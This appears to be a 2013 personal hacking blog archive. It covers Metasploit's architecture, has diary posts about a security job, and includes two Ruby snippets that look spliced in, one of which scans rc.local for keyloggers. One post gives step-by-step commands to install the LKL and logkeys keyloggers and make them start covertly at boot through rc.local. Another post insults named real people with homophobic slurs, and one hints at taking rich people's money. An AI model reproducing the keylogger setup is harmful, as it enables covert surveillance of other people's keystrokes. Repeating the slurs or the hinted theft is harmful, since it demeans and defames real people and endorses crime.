Archive for February, 2013

Hello, H3athe4d here. Today I bring you some topics on Metasploit and its very basics; you may call it its foundation and layout. So, in this post, I will go through the MSF framework in a definitive way for anyone following my posts.

First and foremost, let me explain why people need Metasploit, and why it is used in penetration testing so successfully. The key to success with Metasploit is its modular structure and its flexibility, with its different user interfaces and its functionality. I will discuss here the architecture of the Metasploit framework.

The architecture of the Metasploit framework is based primarily on three things: first “libraries”, second “interfaces”, and third, and the most important one to the user, “modules”.

The libraries consist of:

a.) REX

b.) MSF CORE

c.) MSF BASE

The interfaces consist of:

a.) CONSOLE

b.) CLI

c.) GUI

d.) COMMUNITY EDITION

e.) Armitage

Although the MSF GUI and Armitage both fall under the GUI interface, they aren’t the same, and the same applies to the Community Edition of Metasploit. There are also different “plugins” and “tools” in the Metasploit directory that serve the libraries of the framework, and this whole bunch of libraries in turn serves the interfaces, which the users rely on.

Then there are the “MODULES”, which consist of:

a.) Payload.

b.) Exploits.

c.) Encoders.

d.) NOPS.

e.) Auxiliaries.

I will elaborate on all these terms at a later point, but let’s concentrate on how the framework is “modular” and works the way it should. The Metasploit filesystem and libraries consist of:

LIB || DATA || TOOLS || MODULES || PLUGINS || SCRIPTS || EXTERNAL ||
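As an added example (not code from this post or from the Metasploit project itself), here is a small Ruby loader showing the part of that layout the user touches most: a module’s full reference name (exploit/…, auxiliary/…, nop/…) follows from where its file sits under the modules/ directory, while files under plugins/ or lib/ are library and plugin code, never modules. The sample tree is constructed in a temp directory; the paths mirror real module locations but the files are stubs.

```ruby
require 'tmpdir'
require 'fileutils'

# Directory names under modules/ for the five module types, mapped to the
# prefix used in a module's full reference name (exploits/ -> "exploit/...").
TYPE_PREFIX = { 'exploits' => 'exploit', 'payloads' => 'payload', 'encoders' => 'encoder',
                'nops' => 'nop', 'auxiliary' => 'auxiliary' }.freeze

# Walk <root>/modules/<type>/... and index every .rb file by reference name,
# e.g. modules/exploits/windows/dcerpc/ms03_026_dcom.rb -> "exploit/windows/dcerpc/ms03_026_dcom".
# Only the modules/ tree is walked: plugins/, lib/, tools/ etc. are never modules.
def index_modules(root)
  index = {}
  TYPE_PREFIX.each do |dir, prefix|
    base = File.join(root, 'modules', dir)
    Dir.glob(File.join(base, '**', '*.rb')).sort.each do |path|
      refname = path.delete_prefix(base + '/').delete_suffix('.rb')
      index["#{prefix}/#{refname}"] = path
    end
  end
  index
end

# How many modules of each type were loaded (what "show exploits" etc. list).
def count_by_type(index)
  index.keys.group_by { |name| name.split('/').first }.transform_values(&:size)
end

# Constructed sample tree: hypothetical stub files whose paths mirror the real
# layout (one module per type, plus two non-module files that must be skipped).
SAMPLE_FILES = [
  'modules/exploits/windows/dcerpc/ms03_026_dcom.rb',
  'modules/payloads/singles/windows/shell_bind_tcp.rb',
  'modules/encoders/x86/shikata_ga_nai.rb',
  'modules/nops/x86/single_byte.rb',
  'modules/auxiliary/scanner/portscan/tcp.rb',
  'plugins/nessus.rb',   # plugin, not a module
  'lib/msf/core.rb'      # library code, not a module
].freeze

def build_sample_tree(root)
  SAMPLE_FILES.each do |rel|
    path = File.join(root, rel)
    FileUtils.mkdir_p(File.dirname(path))
    File.write(path, "# stub module file\n")
  end
  root
end
```

Call `index_modules(build_sample_tree(Dir.mktmpdir))` to see the five reference names; a lookup with the directory name as prefix (`exploits/windows/...`) returns nil, which is why msfconsole uses the singular form.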

So, this was my first post regarding Metasploit. I will continue explaining the whole framework in bite-sized posts, easy to follow and understand; catch you people at a later time.


Working on exploitation. The road ahead.

Posted: February 23, 2013 in Life

Hello folks, this is the 23rd of February, and I have no clue how I sleep without making myself the hardest person to EVER penetrate. I am working on exploitation (the art of penetration testing) and, by default, I have come to know a bunch of things which I really would love to share. I believe this has to be shared, not because people didn’t know it already, but for the people who didn’t know this. The art of exploitation, and the road ahead in the security industry, has a bigger scope, but this doesn’t mean ANYONE would fit in the foreign land.

Security, and being able to protect it, needs a sheer amount of dedication which you cannot buy from a market. It’s pure dedication to what you do, and to the things you love to work with. So, on a clean note, the art of exploitation has always been about learning all the time: learning new technology, learning from and researching the past as well, imagining things and framing them to look better (the artistic part!). Good hackers are always good artists as well; they might live a low life but ARE generously good-hearted people, and with the right mix of sugar in the coffee, we get a delicious taste.

I have been researching a lot of things, working all the time, which I love, and I have also been in the midst of corporate people, which is now a part of my life. It’s the career I had always dreamt of; working with computers has always been the good part, and always will be. From a job perspective, this will be the most satisfying job I can get, which most people lack, and hence I take a lead in what I already do. I never had fear of consequences, and never will, because my life has always been this way, and I know the art 😉

Ladies and gentlemen, here I come again with the masked vendetta of truth to entertain you at my expenditure, show you the facts and figure you out of the puzzle, the riddle which is still in the midst of snowy clouds upon them. Here I present TOP 7 MAGGOTRY FAGGOTS ETHICAL HACKERS OF INDIA (10 actually if you refer to THIS POST).

The list enrolls these people on it.

1.) Ankit Fadia (Bankid Mania)
2.) Pranav Mistry (Intellect) <— take him out of the faggottry list.
3.) Sunny Vaghela (LOLOL Sunny boom bash)
4.) Vivek Ramachandran <— yes, an intellect, REAL ACTUAL ETHICAL HACKER.
5.) Koushik Dutta <— CyanogenMod, Android specialist, good coder.
6.) Aseem Jakhar (seriously, you?)
7.) Sai Satish (Phishing really doesn’t make you a hacker, neither do workshops)
8.) Benild Joseph (facepalm, you really think you are inside a *nix kernel?)
9.) Falgun Rathod (you don’t simply fit)
10.) Rahul Tyagi (you are a mass phail joker; at DEFCON, Las Vegas, we discuss your weak brain, we study your 3 cent physiology)

The ones BOLDED in my 1337 list make the 7 maggotry faggot 3thical hackers of India; the word, the term “ethical” itself is NOT to be used, if you already know you are onto ethics, people understand it naturally. 7 mass players of these workshops (they call it deliverance of vivid knowledge on topics of Metasploit, with the Windows DCOM exploit and BOF) and call it h4x0r1ng. A very good study shows the people who DO THINGS never get listed in “such ethical lists”. The workshops these wise people, the bolded ones, conduct are UTTER CRAP with no real h4x0ring in them, which is why “certain” people get provoked when they compare the level of h4x0ring they are onto. Ankit Fadia, the 1999 technobrain, TECHNICALLY doesn’t work out in 2013, it’s that simple FACT. Keeping it real, I still don’t get an idea what Rahul Tyagi is onto? He says he + (some Parul Khanna) are hackers, and yet THEY FAIL SO HARD.

You will get these clowns at:

http://attrition.org/errata/plagiarism/rahul_tyagi/hacking_crux2.html

Search them at attrition.org and you will find what their crap consists of. L O L.
Big time jokers playing the show, the time this simple middle line breaks, REAL people behind the scenes will come out of the den, isn’t it ninjas? 😉

Today I will post about something cooler than the usual crap 🙂 yes, the LKL keylogger for Linux. Since people mostly brag about Win*DOZE* versions of keyloggers, I was forced to come up with this juice of the day to make the night more Linux compatible (since nights also mean h4x0ring, but keylogging ain’t h4x0ring).

What you would need is the free LKL project source code, which can be found at

http://sourceforge.net/projects/lkl/

The page looks something like this; download the source code files:

Screenshot


You need to extract the tar.gz; do this as shown:

Screenshot-1

Do a configure first, on the command line:

./configure
make && make install

I have shown what is to be done in the image below:

Screenshot

How to use?
sudo lkl -l -k /home/XYZ/Downloads/lkl/keymaps/it_km -o /home/XYZ/loggy.log

Now it has to start automatically at every reboot:
cd /etc/init.d
sudo vi rc.local
add at the bottom “/usr/local/bin/lkl -l -k /home/XYZ/Downloads/lkl/keymaps/it_km -o /home/XYZ/loggy.log &”

Edit: Seems some of you had a problem figuring out the keymaps, OK, I will make it much easier:

apt-get install lkl

To see how to use it, type lkl in a terminal, logged in as root of course.
To use this program you must first know where the keymap file for your keyboard layout is located, since that is the layout the keystrokes are recorded against. You can search with the command:

whereis lkl

In my case it is in /usr/share/lkl/keymaps

The command, on my computer:

lkl -l -k /usr/share/lkl/keymaps/us_km -o /home/Coded/logk.txt

Then this message appears:

Started to log port 0x60. Keymap is /usr/share/lkl/keymaps/us_km. The logfile is /home/S@xx0R/logk.txt.

Done.

logkeys v0.1.1a (latest)

fixed 100% CPU issue on x64
various bug fixes
removed pgrep dependency
PID file now in /var/run/
other symlink attack vulnerability fixes
other security fixes
code refactoring
remote log uploading via HTTP
lkl and lklk are now llk and llkk to avoid confusion
llk and llkk are now programs that run logkeys-start.sh/-stop.sh scripts
also recognize “HID” USB keyboard devices
bug fixes

Download:

How to install?
gunzip logkeys-0.1.1a.tar.gz
tar xvf logkeys-0.1.1a.tar
cd logkeys-0.1.1a/
cd build/
../configure
(‘sudo apt-get install build-essential’ if previous command fails)
make
sudo make install

How to use?
sudo logkeys -s -m /home/XYZ/Downloads/de.map -o /home/XYZ/loggy.log
sudo logkeys -k

Now it has to start automatically at boot time:
cd /etc/init.d
sudo vi rc.local
add at the bottom “/usr/local/bin/logkeys -s -m /home/XYZ/Downloads/de.map -o /home/XYZ/loggy.log &”
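The rc.local line above (start the logger at boot, write keystrokes to the -o path) is exactly the persistence a defender auditing a Linux box should look for. As an added example, not code from this post or from the LKL/logkeys projects, this Ruby script parses a constructed rc.local that copies both persistence lines from the post and reports each keylogger start with its keymap and log file; the binary names come from the post and its changelog, and the sample content is constructed.

```ruby
# Binaries the post's two installs are started under: lkl, logkeys, and the
# llk/llkk wrapper scripts named in the logkeys 0.1.1a changelog.
KEYLOGGER_BINS = %w[lkl logkeys llk llkk].freeze

# Constructed rc.local contents copying the post's persistence lines, plus a
# commented-out line and an unrelated service that must both be ignored.
SAMPLE_RC_LOCAL = <<~'RC'
  #!/bin/sh -e
  # rc.local - executed at the end of each multiuser runlevel
  /usr/local/bin/lkl -l -k /home/XYZ/Downloads/lkl/keymaps/it_km -o /home/XYZ/loggy.log &
  # /usr/local/bin/lkl -l -o /tmp/old.log &
  /usr/local/bin/logkeys -s -m /home/XYZ/Downloads/de.map -o /home/XYZ/loggy.log &
  /usr/sbin/sshd
  exit 0
RC

# Returns one finding per active line that starts a known keylogger binary:
# { line:, binary:, keymap:, logfile: }. Comments and other commands are skipped.
def scan_rc_local(text)
  findings = []
  text.each_line.with_index(1) do |line, n|
    cmd = line.strip
    next if cmd.empty? || cmd.start_with?('#')
    argv = cmd.sub(/\s*&\z/, '').split          # drop the trailing "&"
    argv.shift if argv.first == 'sudo'          # the post's usage lines use sudo
    bin = File.basename(argv.first.to_s)
    next unless KEYLOGGER_BINS.include?(bin)
    opts = {}
    argv.each_cons(2) do |flag, val|            # pair each -x flag with its value
      opts[flag] = val if flag.start_with?('-') && !val.start_with?('-')
    end
    findings << { line: n, binary: bin,
                  keymap: opts['-k'] || opts['-m'],   # lkl uses -k, logkeys -m
                  logfile: opts['-o'] }
  end
  findings
end

# The -o paths are the files worth preserving as evidence before removal.
def logfiles(findings)
  findings.map { |f| f[:logfile] }.compact.uniq
end
```

Run `scan_rc_local(File.read('/etc/rc.local'))` on a real host to get the same findings for its own rc.local; the parser is line-based, so an entry split across lines with a backslash would need the lines joined first.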


If you are still unsure, read the manual page (man page) or the README that comes with it; it’s supposed to be in the /lkl/ directory itself, here:

Screenshot-1

That was all; read more or post your comments if you get stuck, astala vista!

There was a time.

Posted: February 8, 2013 in Crap

There has always been a good and a bad side to every person. I had/have my bad sides as well, they aren’t a secret: I smoke, and I am a bit mad when I get angry, that’s all I can recall as far as I know about myself. The good ones, I have a few of them, and “there was a time” when I used to be so innocent, having no idea at all how to compete. To this date, I find strange people all over the place, pondering over their own profit even if they don’t know shit! Still, ah, ignored. But what about the pressure you give “with YOUR” wicked ways to make some profit? Some die, some live and die, the rest “just” live with what they have; what I have is “JUST” a good will to do what I DO. And I never regret what I DO, because I KNOW what I DO.

So this post is all about “pointing” out why there is so much cruelty, selfishness, etc., all over this place. I didn’t really come with a manual to LIVE; life teaches me my own ways in and out. Still, thinking about what is going on with this world leaves me clueless: why it is, what IT IS? I don’t know if anyone has given a second thought to others, how they live. Yesterday I saw a man in the street sleeping, still happy, but in pain from those cold streets; but it is NOT THE PAIN that the streets give him, it’s the pain that WE actually give him, failing ourselves to provide the best for this world, which incredibly provides us so MUCH, and people still want more, WOW.

Today, “if at all”, you realize it, you will forget it by tomorrow; you will regret it for some minutes and then actually move on. BUT I DON’T want this to happen to myself. I always wanted to “make a change”, and for that I have to be the “part of change itself”; I realize the point there. So what are my plans? It’s a little wicked; consider it a “free service”, survival and some donation, without getting covered, etc. JUST A FREE SERVICE for “SOME” people (not the poor), but the undeniable and unlucky “rich people” with their black money 😉

So how do I do this? There are ways, you know: some people show the path, some people lead “that” path, “some” people make their own ways, and I favor the last one 🙂
I wrote this here because I would love to come back and see myself at my posts and calculate what I did, because I promised I would do this. Rest, to the rich prayers 😉 (you think you actually pray to god without being selfish? eh, I see what you did there!)

Good night, think about it 🙂

All about IT ethics.

Posted: February 7, 2013 in Life

Hey, I am writing this from my lab desk. SO here’s to what we call the “IT” ethics: never call a guy/girl with a “ma’am”, “sir”, etc. tag; always the “first name” is to be used, said one of my seniors. So, from today we follow this, eh? But what about the ladies? I call them “jee” after taking their name, but that is not allowed, sad!

I don’t care about the ethics tho, because my mind always triggers to call them by their name + “jee” or “insert_some_other_tag_here”; but that’s okay, I have to maintain and train myself to use ‘only’ the first name. So here are 2 girls (management sector of the company) + 1 my senior + 2nd senior + 3rd senior = total of 5 + 1 (including me) = 6 members (close ones, core members).

So that’s all for today that I learned apart from the technical stuff !
Catch you people later !

3rd day at office

Posted: February 6, 2013 in Life

Responsibilities are BIG. Real work starts today. So, today I went down the stairs, down the hallway, and bingo, a call came. We have clients to get their work done; well, what is the work? The work I already do. So there are certain agencies that would hire certain people to do their work for them; sometimes it may be illegal and sometimes legal, depending on the situation. But we are sticking to the legal ones, because we have to change from the bad side and come out to the good side and do good, and trust me, we are trained for this. But the moment you enter the office, there is a crap load of stuff you can do: routers, switches (the big ones!), leased lines and much more. The plan has always been to do good and come to the market with advisories. But what about when you find a bank full of money on a server ready to get leaked? Do you possibly go for it, which “would” downgrade your reputation, at least in the real world, but at the same time make full-time black hat money? I had been down that lane, but nah, this isn’t the time; the oath I took to myself has always been persistent, has been intact with my beliefs. SO NO. There are always opportunities all around, but apart from that, what matters is ‘control’.

So this has been the 3rd day in the office; things are secure, the lines are secure, no unusual activities. Chances are we get in, get out, put up a designed framework for the methods we used to “get in”, and then prepare an advisory; that’s it, simple, no lurking around confidential data which would bring me profit for a real long time. Also, I love this job: knowing secrets, but at the same time “keeping” them a “secret” for “some” and “them” only. The day starts, and we are ready to step in. Roger that sir!

Started with Linux shoOting.

Posted: February 5, 2013 in Linux

Here’s the big deal: I have started out with hardcore Linux, because I need to add up my skills onto something and remake it artistically beneficial for the companies that hire me. So I have taken this good ‘initiative’ to write what I learn in this blog, for others to know; you will find this blog really useful if you read it, and not just look at it. Apart from personal life and all the other stuff I do, there have been drastic changes all the time. The parts I have divided this Linux series into are the following:

-> Linux Beginners
-> Linux Intermediate
-> Linux Advanced

At the beginners’ level, I will just wrap up the flow of the theories that Linux and its flavors fit into. At the intermediate level, I will go through the Linux CLI (the command line interface), then bash scripting and the different shells and their manipulation, and then we will talk about Linux Advanced, where we will go deep down to the kernel, memory management, page mapping, buffers, clocking the Linux system, modprobing the drivers to work with, dependencies and several other higher aspects. So stay tuned to the Linux section 😀

Onto the lights…

Posted: February 5, 2013 in Life

Onto the lights of the midnight, he codes, onto the lights of the midday, he executes, until the evening, he sleeps, and onto the dreams, she spells magic within him.

It’s been a long journey since my college detention up to here now. There have been drastic changes, things that have molded me, shaped me into what I am here today. Things have changed for better growth, and I accepted everything with a 🙂; there is nothing to regret. Also, to add up, she comes in my dreams, cheers me up, and when I get up, I stay tuned to the mobile screen to see her txt. On midnights I rarely txt her, not after 1:00 AM, but again, I wake up for the whole 6:00 AM. It’s got tough (the life) but “perfect” with the beautifulness of the code in my brain.

Hello_world.include_world()

Posted: February 5, 2013 in Crap

Broadcasting the world, this is h3athead, I will be publishing and keeping a track of my research and all other work here, this blog is made to keep myself updated and to follow my daily routine of the techno lulz with some learning that I deserve. All my work and written records go here. Rogering out./- h3athead !